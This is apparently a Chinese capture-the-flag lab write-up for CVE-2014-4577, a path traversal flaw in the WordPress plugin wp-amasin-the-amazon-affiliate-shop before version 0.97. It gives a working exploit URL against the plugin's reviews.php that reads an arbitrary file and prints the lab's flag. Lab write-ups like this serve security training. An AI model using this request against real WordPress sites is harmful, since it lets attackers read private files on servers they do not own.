春秋云镜 CVE-2014-4577

春秋云镜 CVE-2014-4577 wordpress插件 wp-amasin-the-amazon-affiliate-shop < 0.97 LFI

靶标介绍

wordpress插件 wp-amasin-the-amazon-affiliate-shop < 0.97 存在路径穿越漏洞,使得可以读取任意文件。

启动场景

春秋云镜 CVE-2014-4577_第1张图片

漏洞利用

exp

http://url/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/flag

在这里插入图片描述
得到flag

flag{829abb40-e72b-48e4-bcbb-755d099e05f9}

你可能感兴趣的:(靶场,安全,web安全)